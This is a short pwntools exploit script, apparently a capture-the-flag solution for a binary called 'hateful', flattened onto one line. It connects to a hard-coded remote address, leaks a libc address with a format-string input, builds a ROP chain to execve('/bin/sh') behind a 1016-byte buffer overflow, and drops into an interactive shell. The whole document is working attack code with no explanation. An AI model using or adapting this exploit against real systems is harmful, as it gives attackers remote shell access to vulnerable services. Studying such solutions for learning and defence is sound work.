hateful from pwn import * from sys import * context.log_level = 'warning' context.arch = 'amd64' elf = ELF("./hateful_patched") p = process("./hateful_patched") libc = ELF("./libc.so.6") r = remote('52.59.124.14',5020) r.recvuntil(b'>> ') r.sendline(b'yay') r.recvuntil(b'>> ') r.sendline(b'%5$p') r.recvuntil(b'email provided: ') res = int(r.recvline().rstrip(), 16) libc.address = (res - libc.sym['_IO_2_1_stdin_']) binsh = next(libc.search(b'/bin/sh\x00')) rop = ROP(libc) rop.execve((binsh), 0, 0) payload = b'A'*1016 payload += rop.chain() r.recvuntil(b'!') r.recvline() r.sendline(payload) r.interactive()